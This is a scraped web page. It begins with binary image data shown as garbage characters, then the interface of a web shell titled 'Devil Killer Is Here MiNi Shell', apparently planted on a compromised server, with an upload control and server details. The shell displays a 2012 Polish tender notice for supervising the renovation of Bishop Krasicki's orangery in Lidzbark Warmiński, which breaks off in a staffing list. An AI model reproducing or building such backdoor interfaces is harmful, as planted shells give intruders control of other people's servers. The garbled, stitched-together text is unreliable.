JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120406/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120406/79899-N-2012.html

<p class="kh_header"><b>Lidzbark Warmiński: Pełnienie kompleksowego nadzoru inwestorskiego i konserwatorskiego oraz pełnienie funkcji inwestora zastępczego w projekcie  pn.: Renowacja letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz z zagospodarowaniem terenów wokół oraz zakup wyposażenia</b><br>
<b>Numer ogłoszenia: 79899 - 2012; data zamieszczenia: 06.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Lidzbark Warmiński , ul. A. Świętochowskiego 14, 11-100 Lidzbark Warmiński, woj. warmińsko-mazurskie, tel. 089 7678500, faks 089 7672303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://lidzbarkw-um.bip-wm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie kompleksowego nadzoru inwestorskiego i konserwatorskiego oraz pełnienie funkcji inwestora zastępczego w projekcie  pn.: Renowacja letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz z zagospodarowaniem terenów wokół oraz zakup wyposażenia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest pełnienie kompleksowego nadzoru inwestorskiego                        i konserwatorskiego oraz pełnienie funkcji inwestora zastępczego w projekcie  pn.: 
      Renowacja letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz                              
      z zagospodarowaniem terenów wokół oraz zakup wyposażenia, z podziałem na   
      następujące zadania:
- Zadanie nr 1 - Pełnienie kompleksowego nadzoru inwestorskiego w projekcie pn.:
     Renowacja letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz                           
     z zagospodarowaniem terenów wokół oraz zakup wyposażenia,
- Zadanie nr 2 - Pełnienie kompleksowego nadzoru konserwatorskiego w projekcie pn.:
     Renowacja letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz                           
     z zagospodarowaniem terenów wokół oraz zakup wyposażenia,
- Zadanie nr 3 - Pełnienie funkcji inwestora zastępczego w projekcie pn.: Renowacja
     letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz                                       
     z zagospodarowaniem terenów wokół oraz zakup wyposażenia.
2.  Podstawowe obowiązki Wykonawcy: 
2.1   Do podstawowych obowiązków Wykonawcy, w zakresie Zadania nr 1 - Pełnienie   
       kompleksowego nadzoru inwestorskiego w projekcie pn.: Renowacja letniego pałacu 
      Oranżerii Biskupa Ignacego Krasickiego wraz z zagospodarowaniem terenów wokół oraz 
      zakup wyposażenia, należeć będzie:
    1) Pełnienie kompleksowego nadzoru inwestorskiego nad realizacją projektu, zgodnie                 
        z postanowieniami decyzji pozwolenia na budowę, przepisami prawa budowlanego                      
        i innymi obowiązującymi w tym zakresie przepisami, a w szczególności:
a)	Reprezentowanie inwestora na budowie poprzez sprawdzenia zgodności     realizowanego projektu z umową, dokumentacją projektową i pozwoleniem na budowę, zasadami wiedzy technicznej oraz przepisami techniczno-budowlanymi                 i Polskimi Normami;
b)	Przeciwdziałanie nieprawidłowościom na placu budowy w związku z realizacją 
    	      projektu oraz podejmowanie niezbędnych w tym zakresie czynności;
c)	Sprawdzanie jakości wykonywanych robót, wbudowanych wyrobów budowlanych,                       
  	      a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych                   
             i niedopuszczonych do obrotu i stosowania w budownictwie;
d)	Sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, 
    	      uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń   
  technicznych oraz przygotowanie i udział w czynnościach odbioru końcowego   
  projektu i przekazanie go do użytkowania;
e)	Potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także kontrolowanie rozliczeń budowy poprzez potwierdzenie wykonanego przez realizatora robót budowlano-montażowych zakresu rzeczowego i finansowego projektu, w szczególności w zakresie zgodności przyjętych założeń                                  w harmonogramie rzeczowo-finansowym, w protokołach odbioru robót, stanowiących podstawę do wystawiania faktur przez realizatora robót;
f)	Kontrola postępu prac i robót;
g)	Sprawdzanie kosztorysów inwestorskich, ofertowych, robót dodatkowych                          i zamiennych pod względem kompletności zawartości i prawidłowości ich wykonania;
h)	Udział i przewodnictwo w naradach roboczych (sporządzanie protokołów z narad) na etapie realizacji projektu mających na celu m.in. rozstrzyganie technicznych spraw  budowy, omawianie przebiegu realizacji budowy, itp.;
i)	Opracowanie oraz przekazywanie Zamawiającemu niezbędnych dokumentów do   
             uruchomienia finansowania projektu;
j)	Stwierdzanie gotowości  wykonanych robót do odbioru;
k)	Dokonywanie obiorów częściowych robót oraz odbioru końcowego;
l)   Przekazywanie Zamawiającemu protokołów odbioru oraz dokumentacji   
            powykonawczej;
       ł)  Obecność podczas kontroli zewnętrznych w trakcie realizacji projektu i po jego    
            zakończeniu;
       m) Dokonywanie czynności sprawdzenia kalkulacji szczegółowych lub kosztorysów 
            przedkładanych przez Wykonawcę lub Wykonawców robót, pod względem    
            zgodności wyceny z warunkami umownymi;
n)  Uzyskanie na rzecz Zamawiającego decyzji o dopuszczeniu zrealizowanego 
             projektu do użytkowania;
           o)  Udział w pracach komisji powołanych do przeglądów gwarancyjnych dla   
                zrealizowanego projektu i o ile zajdzie taka potrzeba udział w pracach komisji   
                powołanych do ustalenia stwierdzonych wad i usterek w realizowanym                                   
                i przekazanym do użytkowania obiekcie oraz kontrola ich usunięcia w okresie  
                trwania gwarancji;
           p)  Uczestniczenie w przeglądach w okresie gwarancji i rękojmi oraz kontrolowanie 
                usuwania ujawnionych wad i usterek;
           r)  Dokonywanie regularnych wpisów do dziennika budowy;
           s)  Składanie kwartalnych raportów o stanie zaawansowania inwestycji oraz 
               występujących trudności w realizacji prac i odstępstwach od umowy zawartej przez    
                Zamawiającego z Wykonawcą prac konserwatorskich i robót budowlanych;
           t)  Wykonywanie innych czynności nie wymienionych wyżej, które są niezbędne do 
               prawidłowej realizacji projektu.

2.2	Do podstawowych obowiązków Wykonawcy, w zakresie Zadania nr 2 - Pełnienie kompleksowego nadzoru konserwatorskiego w projekcie pn.: Renowacja letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz z zagospodarowaniem terenów wokół oraz zakup wyposażenia, należeć będzie:
1)	Reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności
    prowadzonych prac konserwatorskich oraz robót budowlanych z wydanymi                             pozwoleniami konserwatorskimi, uzgodnioną dokumentacją, tj. programami konserwatorskimi, projektami budowlanymi, sztuką konserwatorską oraz ustawą                    z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (Dz. U. z 2003 r.                 nr 162, poz. 1568 z poźn. zm.), Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych                   i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. nr 165 poz. 987) oraz z treścią umowy zawartej pomiędzy Zamawiającym a Wykonawcą prac konserwatorskich i robot budowlanych;
       2) Zapobieganie zagrożeniom mogącym spowodować uszczerbek dla wartości zabytku
           podczas realizacji robót budowlanych i prac konserwatorskich;
       3) Współpraca z inspektorami nadzoru budowlanego i osobą sprawującą nadzór
           archeologiczny;
       4) Rozwiązywanie problemów związanych z technologią prowadzenia prac  
           konserwatorskich, ewentualnie inicjowanie spotkań komisji konserwatorskiej                           
           w ramach bieżących potrzeb lub w przypadku wystąpienia spornych kwestii lub  
           innych skomplikowanych problemów wymagających rozwiązania;
       5) Potwierdzenie faktycznie wykonanych prac konserwatorskich zgodnie z wydanymi
pozwoleniami konserwatorskimi, uzgodnioną dokumentacją tj. programami
konserwatorskimi, sztuką konserwatorską oraz z ustawą z dnia 23 lipca 2003r.                       o ochronie zabytków i opiece nad zabytkami (Dz. U. z 2003r. nr 162 poz. 1568 z poźn. zm.), 
Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. nr 165 poz. 987);       6) Weryfikacja i odbiór dokumentacji z przeprowadzonych prac konserwatorskich;
       7) Sprawdzanie dokumentów przedłożonych przez Wykonawcę prac konserwatorskich                  
           i robót budowlanych do odbiorów częściowych i odbioru końcowego w zakresie  
           dotyczącym zagadnień konserwatorskich;
       8) Podejmowanie w toku budowy wspólnie z Zamawiającym decyzji dotyczących  
           zagadnień konserwatorskich tej budowy;
       9) Uczestnictwo w odbiorach przy pracach zanikających i inspekcjach technicznych oraz
           odbiorze końcowym;
      10) Uczestniczenie w spotkaniach organizowanych przez Zamawiającego, Wykonawcę   
           prac konserwatorskich i robót budowlanych oraz sporządzanie protokołów z narad;
      11) Dojazd i pobyt na placu budowy - minimum cztery razy w miesiącu lub wg potrzeb po
            wcześniejszym uzgodnieniu z Zamawiającym;
      12) W przypadku wyniknięcia po zakończeniu usługi kwestii spornych dotyczących  
           zagadnień konserwatorskich i robót budowlanych pomiędzy Zamawiającym                          
           a Wykonawcą prac konserwatorskich i robót budowlanych, Wykonawca zobowiązany 
           jest do nieodpłatnego uczestnictwa w działaniach mających na celu rozstrzygnięcie   
           kwestii spornych poprzez sporządzenie niezbędnych opinii, weryfikacji itp. przez cały  
           okres udzielonej przez Wykonawcę prac konserwatorskich i robót budowlanych  
           gwarancji i rękojmi;
     13) Uczestniczenie w przeglądach w okresie gwarancji i rękojmi oraz kontrolowanie 
           usuwania ujawnionych wad i usterek;
     14) Prowadzenie dokumentacji z przeprowadzonych nadzorów w formie dziennika   
           nadzorów konserwatorskich;
     15) Dokonywanie regularnych wpisów do dziennika budowy;
     16) Składanie kwartalnych raportów o stanie zaawansowania inwestycji oraz 
          występujących trudności w realizacji prac i odstępstwach od umowy zawartej przez    
          Zamawiającego z Wykonawcą prac konserwatorskich i robót budowlanych,
    17) Wykonywanie innych czynności nie wymienionych wyżej, które są niezbędne do 
         prawidłowej realizacji projektu.

2.3  Do podstawowych obowiązków Wykonawcy, w zakresie Zadania nr 3 - Pełnienie funkcji  
      inwestora zastępczego w projekcie pn.: Renowacja letniego pałacu Oranżerii Biskupa 
      Ignacego Krasickiego wraz  z zagospodarowaniem terenów wokół oraz zakup wyposażenia,   
      należeć będzie:
1)	Wykonywanie wszelkich działań wynikających z przepisów prawa lub wytycznych    
        Instytucji Zarządzającej Regionalnym Programem Operacyjnym Warmia i Mazury na lata    
        2007-2013, które umożliwią Zamawiającemu prawidłową realizację Projektu     
        dofinansowanego ze środków Unii Europejskiej, w sposób zgodny z umową                        
        o dofinansowanie, instrukcjami, założeniami programowymi i dyrektywami, w tym m.in. 
        opracowanie, przygotowanie i terminowe  przekazanie w imieniu Zamawiającego do 
        Instytucji Zarządzającej raportów, sprawozdań, wniosków o płatność i wszelkich innych 
        dokumentów będących wypełnieniem obowiązków nałożonych na Beneficjenta środków 
        unijnych przy realizacji Projektów dofinansowywanych w ramach RPO WiM;
2)	Reprezentowanie Zamawiającego wobec uczestników procesu inwestycyjnego, 
        właściwych organów oraz osób trzecich we wszystkich fazach realizacji inwestycji oraz  
        w okresie gwarancji i rękojmi;
3)	Współdziałanie z przedstawicielami Zamawiającego i Nadzoru Inwestorskiego                            
        w realizacji projektu zgodnie z postanowieniami decyzji pozwolenia na budowę,   
        przepisami prawa budowlanego i innymi obowiązującymi w tym zakresie przepisami;
4)	Sprawdzenie harmonogramu rzeczowo-finansowego dostarczonego przez realizatora 
        robót, w terminie nie dłuższym niż 7 dni od daty otrzymania ww. harmonogramu;
5)	Udział w naradach roboczych (sporządzanie protokołów z narad) na etapie realizacji 
        projektu mających na celu m.in. rozstrzyganie technicznych spraw budowy, omawianie 
        przebiegu realizacji budowy, itp.;
6)	Opracowanie oraz przekazywanie Zamawiającemu i Instytucji Zarządzającej niezbędnych 
        dokumentów do uruchomienia finansowania projektu;
7)	Obecność podczas kontroli zewnętrznych w trakcie realizacji projektu i po jego zakończeniu;
8)	Sprawdzanie faktur Wykonawcy oraz dokumentów załączonych do rozliczenia robót - 
     Projektu pod względem zgodności z wytycznymi Instytucji Zarządzającej 
9)	Wykonywanie innych czynności nie wymienionych wyżej, które są niezbędne do 
        prawidłowej realizacji projektu.
3.  Projekt pn.:Renowacja letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz   
z zagospodarowaniem terenów wokół oraz zakup wyposażenia,  realizowany jest zgodnie                  z warunkami kontraktowymi FIDIC - Żółta książka - Warunkami kontraktowymi dla Urządzeń oraz Projektowania i Budowy dla urządzeń elektrycznych i mechanicznych oraz robót inżynieryjnych i  budowlanych projektowanych przez wykonawcę (CONDITIONS OF CONTRACT FOR PLANT AND DESIGN - BUILD). Wydawnictwo: SIDIR; ISBN: 83-86774-28-2; Rok wydania: SIDIR 2008 FIDIC 1999; Opis edycji: 4. Wydanie angielsko-polskie niezmienione 2008 z erratą (Tłumaczenie pierwszego wydania 1999), przygotowane                       i opublikowane przez Międzynarodową Federację Inżynierów Konsultantów (Fédération Internationale des Ingénieurs-Conseils - FIDIC), P.O. Box 86, CH- 1000 Lausanne 12, Szwajcaria).  W zakres ww. projektu wchodzi:
1)	zaprojektowanie i wykonanie stabilizacji skarpy i fundamentów budynku Oranżerii,
2)	zaprojektowanie i wykonanie kompletnego remontu budynku i instalacji                      
         z remontem konserwatorskim obiektu, z wyburzeniem ścian wewnętrznych,   
         wymianą stropów nad częścią części parterowej (z wyłączeniem Sali oktogonalnej)  
         i likwidacją zsypów na węgiel do pomieszczeń piwnicznych,
3)	zaprojektowanie i wykonanie zagospodarowania terenu, w zakres którego wchodzi:
a)	Wykonanie przedinwestycyjnych badań archeologicznych w celu    rozpoznania historycznego układu i sposobu zagospodarowania założenia parkowego oraz rozpoznania gatunkowego składu roślinnego, których wyniki mają posłużyć do właściwego zaprojektowania renowacji,
b)	Opracowanie niezbędnej dokumentacji koniecznej do uzyskania pozwolenia  na przeprowadzenie badań archeologicznych i konserwatorskich, prac  konserwatorskich, restauratorskich i robót budowlanych przy zabytkach,
c)	Przebudowa i budowa ciągów spacerowych,
d)	Rozbiórka istniejących, zaprojektowanie i  budowa nowych schodów 
                    prowadzących do Oranżerii, 
e)	Budowa oświetlenia elektrycznego,
f)	Budowa dwóch fontann oraz kaskady wodnej miedzy schodami wraz                         z niezbędnym do funkcjonowania oprzyrządowaniem,
g)	Wykonanie podświetlenia: 
                    - pałacu letniego,
      	     - fontanny,
                    - murków z miejscami siedzącymi,
   		h)  Wymiana ławek parkowych i koszy na śmieci,
   		i) Zmeliorowanie terenów u podnóża skarpy i odwodnienie terenu,
   		j) Remont nawierzchni drogi dojazdowej do parkingu oraz parkingu od strony 
     		   południowo- zachodniego narożnika Oranżerii,
  		k) Remont parkingu wzdłuż ul. Krasickiego oraz przystosowanie go do 			              możliwości zatrzymywania się autokarów,
4)	Zaprojektowanie i wykonanie terenów zielonych.
4. Zakres prac do nadzorowania został szczegółowo opisany w programie funkcjonalno-   
    użytkowym stanowiącym załącznik nr 9 do specyfikacji istotnych warunków zamówienia.
5. Letni pałacyk Oranżeria (z parkiem) przy ul. Krasickiego 2 w Lidzbarku Warmińskim    
    objęty jest ścisłą prawną ochroną konserwatorską w oparciu o art. 7 pkt. 1 Ustawy z dnia 
    23 lipca 2003 r. o ochronie i  opiece nad zabytkami (Dz.U. z 2003 r. Nr 162, poz. 1568                 
    z późn. zm.), na podstawie decyzji W-M WKZ z dnia 17.12.1957 r. wpisującej obiekt do 
    rejestru zabytków nieruchomych Województwa Warmińsko-Mazurskiego. W czasie   
    realizacji inwestycji wszelkie prace,  w tym ziemne, na terenie objętym ochroną  
    konserwatorską należy prowadzić pod stałym nadzorem konserwatorskim                                  
    i  archeologicznym, zgodnie z pozwoleniami i z zaleceniami Urzędu Ochrony Zabytków.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.63.13.00-3, 92.52.20.00-6, 71.54.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na specyfikę przedmiotu zamówienia oraz braku obowiązku posiadania szczególnych uprawnień przez wykonawców ubiegających się o przedmiotowe	zamówienie nałożonych przez przepisy prawa, Zamawiający nie opisuje sposobu 
          dokonywania oceny spełnienia ww. warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.2.1 W zakresie zadania nr 1 - Pełnienie kompleksowego nadzoru inwestorskiego                          
w  projekcie pn.: Renowacja letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz                                z zagospodarowaniem terenów wokół oraz zakup wyposażenia

     Zamawiający uzna, że Wykonawca  spełnia niniejszy warunek, jeżeli Wykonawca  
     wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres 
     prowadzenia działalności jest krótszy, w tym okresie wykonał co najmniej jedną usługę 
     kompleksowego nadzoru inwestorskiego nad wykonywaniem robót budowlanych
     w budynkach wpisanych do rejestru zabytków nieruchomych, o wartości roboty nie
     mniejszej niż 2 000 000,00 zł brutto (słownie: dwa miliony złotych brutto). 
     Wykonawca zobowiązany jest do złożenia dokumentów potwierdzających, że usługi te 
     zostały wykonane należycie.  	
     Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą    
     wykazać, że łącznie spełniają powyższy warunek.

1.2.2 W zakresie zadania nr 2 - Pełnienie kompleksowego nadzoru konserwatorskiego                          w  projekcie pn.: Renowacja letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz 
z zagospodarowaniem terenów wokół oraz zakup wyposażenia

     Zamawiający uzna, że Wykonawca  spełnia niniejszy warunek, jeżeli Wykonawca  
     wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres 
     prowadzenia działalności jest krótszy, w tym okresie, wykonał co najmniej dwie usługi 
     kompleksowego nadzoru konserwatorskiego nad wykonywaniem prac konserwatorskich   
     lub kierował pracami konserwatorskimi w budynkach wpisanych do  rejestru zabytków 
      nieruchomych, o łącznej wartości wszystkich prac nie mniejszej niż 200 000,00 zł brutto   
     (słownie: dwieście tysięcy złotych brutto).
     Wykonawca zobowiązany jest do złożenia dokumentów potwierdzających, że usługi te 
     zostały wykonane należycie.  	
     Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą    
     wykazać, że łącznie spełniają powyższy warunek.

1.2.3 W zakresie zadania nr 3 - Pełnienie funkcji inwestora zastępczego w projekcie pn.: Renowacja letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz                                                 z zagospodarowaniem terenów wokół oraz zakup wyposażenia

    Zamawiający uzna, że Wykonawca  spełnia niniejszy warunek, jeżeli Wykonawca  
     wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres 
     prowadzenia działalności jest krótszy, w tym okresie wykonał co najmniej jedną usługę
    polegającą na pełnieniu funkcji inwestora zastępczego lub inżyniera kontraktu, w robotach   
     budowlanych,  o wartości roboty nie mniejszej niż 2 000 000,00 zł brutto (słownie: dwa 
    miliony złotych brutto). 
     Wykonawca zobowiązany jest do złożenia dokumentów potwierdzających, że usługi te 
     zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełnienia ww. warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.3.1 W zakresie zadania nr 1 - Pełnienie kompleksowego nadzoru inwestorskiego                          
w  projekcie pn.: Renowacja letniego pałacu Oranżerii Biskupa Ignacego Krasickiego wraz                                z zagospodarowaniem terenów wokół oraz zakup wyposażenia

Zamawiający uzna, że Wykonawca  spełnia niniejszy warunek, jeżeli Wykonawca  
wykaże, że dysponuje następującymi osobami, które będą uczestniczyć w wykonaniu zamówienia:

a)	Osoba 1 - Kierownik Zespołu - Inspektor nadzoru inwestorskiego,
      posiadający:
- uprawnienia budowlane  do kierowania robotami w specjalności konstrukcyjno-budowlanej bez ograniczeń wydane na podstawie aktualnych przepisów Prawo budowalne, lub odpowiadające im ważne  uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- co najmniej 5 letnie doświadczenie w kierowaniu budową lub robotami budowlanymi, lub w wykonywaniu nadzoru inwestorskiego,
- co najmniej 2 -letnią praktykę zawodową odbytą na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków.

b)	Osoba 2 - Inspektor nadzoru inwestorskiego - branża sanitarna, posiadający:
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych wydane na podstawie aktualnych przepisów ustawy Prawo budowlane, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- co najmniej 3 letnie doświadczenie w kierowaniu budową lub robotami budowlanymi, lub w wykonywaniu nadzoru inwestorskiego,
c)	Osoba 3 - Inspektor nadzoru inwestorskiego - branża elektryczna, posiadający:
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności
instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych
i elektroenergetycznych wydane na podstawie aktualnych przepisów ustawy Prawo budowlane, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- co najmniej 3 letnie doświadczenie w kierowaniu budową lub robotami budowlanymi, lub w wykonywaniu nadzoru inwestorskiego,
d)	Osoba 4 - Inspektor nadzoru inwestorskiego -  branża drogowa, posiadający:
